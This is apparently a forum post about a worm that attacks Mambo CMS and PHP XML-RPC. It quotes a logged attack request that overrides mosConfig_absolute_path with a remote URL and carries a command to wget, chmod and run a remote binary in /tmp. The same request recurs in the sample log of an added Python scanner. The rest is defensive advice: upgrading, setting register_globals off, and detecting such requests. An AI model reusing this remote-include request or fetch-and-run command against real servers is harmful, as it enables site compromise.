F-Secure is warning of a network worm that targets vulnerabilities in the Mambo Content Management System (CMS) and PHP XML-RPC, a library of code for PHP programmers that allows procedures to run between computers with different operating systems.
[infoworld.com...]
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://[edit ip removed]/cmd.gif?&cmd=cd%20/tmp;wget%[edit ip removed]/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo¦ HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The best thing you can do is not only upgrade to the newest version of Mambo/Joomla, but also add the following line to php.ini. It will stop PHP programs from using variables injected via the URL, unless the program specifically requests them. It will not only close this hole, but also holes that have not been discovered yet.
register_globals=off
Remember to test your site after changing this setting, because many PHP-based sites rely on the easy way that global information is passed to the internals of PHP when the setting is on, and the site might stop working properly when register_globals is set to off.
Sometimes you have to get hacked and learn the hard way. That happened on one of the sites we maintain, and we now have learned our lesson and incorporate web vulnerability scanning into our development lifecycle.
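An added log-scanning example (not from this thread, F-Secure, or the Mambo project) that flags requests of the shape quoted above: register_globals-style overrides of Mambo's mosConfig_* settings, the GLOBALS= trick, and _REQUEST[] injection, with a URL value in mosConfig_absolute_path reported as a remote include attempt. The log lines, IP addresses and the CONFIG_GLOBALS list are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not the thread's real log); the first
# mirrors the shape of the request quoted in the post above.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Nov/2005:10:00:01 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo HTTP/1.1" 404 295 "-" "Mozilla/4.0"
203.0.113.9 - - [21/Nov/2005:10:00:02 +0000] "GET /mambo/index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Nov/2005:10:00:03 +0000] "GET /mambo/index2.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Mambo configuration globals that register_globals lets a request overwrite
# (assumed list for this example). A URL value means include() fetches remote code.
CONFIG_GLOBALS = {"mosConfig_absolute_path", "mosConfig_live_site"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"(?i)^(https?|ftp)://")


def classify(line):
    """Return the reasons a log line looks like a register_globals abuse attempt ([] if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values and keeps 'GLOBALS=' (empty value) as a key
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    reasons = []
    if "GLOBALS" in params:
        reasons.append("GLOBALS supplied as a request parameter")
    for name in sorted(CONFIG_GLOBALS & params.keys()):
        for value in params[name]:
            if REMOTE_RE.match(value):
                reasons.append(f"remote include via {name}={value}")
            else:
                reasons.append(f"config override via {name}")
    if any(k.startswith("_REQUEST[") for k in params):
        reasons.append("_REQUEST array injection")
    return reasons


def scan(log_text):
    """Return [(line_number, reasons)] for every line with at least one finding."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            findings.append((number, reasons))
    return findings
```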
From Mamboserver.com
The vulnerability in Mambo is the one that was fully described on 21 November 2005, when a patch was provided against such exploits. The patch can be applied to any version of Mambo, or any PHP program.